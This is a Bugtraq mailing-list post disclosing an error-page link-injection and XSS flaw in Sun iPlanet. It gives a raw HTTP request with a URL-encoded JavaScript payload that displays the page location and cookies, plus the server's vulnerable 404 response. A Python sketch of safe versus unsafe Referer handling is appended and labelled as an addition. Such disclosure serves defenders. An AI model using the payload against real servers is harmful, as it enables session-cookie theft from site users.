Bugtraq mailing list archives
Sun iPlanet Error Page Link Injection
From: BugsNotHugs <bugsnothugs () gmail com>
Date: Sat, 30 Jun 2012 16:11:32 -0600
Sun iPlanet Error Page Link Injection

known about long time, but no CVE! probably because this really lame vulnerability! some security pro will say this good for social engineering and give cyberwar example!
GET /%27%29%3b%61%6c%65%72%74%28%27%58%53%53%5c%72%5c%72%27%2b%27%4c%6f%63%61%74%69%6f%6e%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2b%27%5c%72%43%6f%6f%6b%69%65%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%2f%2f%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://exploit-db.com/
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4321; InfoPath.2; .NET CLR 2.0.50737)
Host: target.server
Cache-Control: no-cache
Cookie: ARPT=MyCoOkIe
Connection: close

<HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD>
<H1>Not Found</H1>
The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it. Please inform the site administrator of the <A HREF="https://exploit-db/">referring page</A>.
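The error page above turns the client-supplied Referer header into a link. The following is an added example, not part of the original post and not iPlanet code: a sketch of that rendering next to a hardened form that links the referrer only when it is an http(s) URL on the server's own host and HTML-escapes it first. The function names, the page template and the sample Referer values are assumptions made for the illustration.

```python
import html
from urllib.parse import urlsplit

# Simplified version of the "Not Found" page quoted in the post.
NOT_FOUND = (
    "<HEAD><TITLE>Not Found</TITLE></HEAD><H1>Not Found</H1>\n"
    "The requested object does not exist on this server. {tail}"
)
LINK = ('Please inform the site administrator of the '
        '<A HREF="%s">referring page</A>.')


def render_404_unsafe(referer):
    """Behaviour shown in the post: the Referer value is copied into HREF as-is."""
    return NOT_FOUND.format(tail=LINK % referer)


def render_404_safe(referer, own_host):
    """Hardened form (hypothetical helper).

    own_host is the server's hostname without a port. The referrer is linked
    only if it is an http(s) URL whose host is own_host; anything else yields
    a page with no link at all. The value is HTML-escaped before it is placed
    in the attribute, so quotes and angle brackets cannot close it.
    """
    tail = ""
    if referer:
        try:
            parts = urlsplit(referer)
            same_site = (parts.scheme in ("http", "https")
                         and parts.hostname == own_host.lower())
        except ValueError:  # malformed authority, e.g. an unclosed IPv6 bracket
            same_site = False
        if same_site:
            tail = LINK % html.escape(referer, quote=True)
    return NOT_FOUND.format(tail=tail)


if __name__ == "__main__":
    # Constructed sample values; the first is the Referer from the post.
    for ref in ("http://exploit-db.com/", "http://target.server/index.html"):
        print(render_404_unsafe(ref))
        print(render_404_safe(ref, "target.server"))
```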